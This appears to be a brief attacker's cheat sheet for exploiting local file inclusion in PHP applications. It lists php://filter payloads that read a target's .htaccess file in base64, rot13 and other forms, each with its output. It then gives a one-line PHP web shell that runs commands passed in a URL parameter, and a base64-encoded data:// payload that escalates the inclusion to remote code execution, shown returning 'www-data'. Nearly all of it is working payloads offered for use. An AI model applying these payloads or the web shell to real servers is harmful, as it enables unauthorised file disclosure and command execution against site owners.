Target File .htaccess Output with PHP String Filters

1. No Filter Applied Output: Testing PHP Filter

2. Payload: php://filter/convert.base64-encode/resource=.htaccess Output: VGVzdGluZyBQSFAgRmlsdGVy

3. Payload: php://filter/string.rot13/resource=.htaccess Output: Grfgvat CUC Svygre

4. Payload: php://filter/string.toupper/resource=.htaccess Output: TESTING PHP FILTER

5. Payload: php://filter/string.tolower/resource=.htaccess Output: testing php filter

6. Payload: php://filter/string.strip_tags/resource=.htaccess Output: Testing PHP Filter This filter remove any HTML or PHP tags from the file contents.

PHP Payload:

<?php system($_GET['cmd']); echo 'Shell done!'; ?>

Payload for LIF to RCE:

php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami

Output: www-data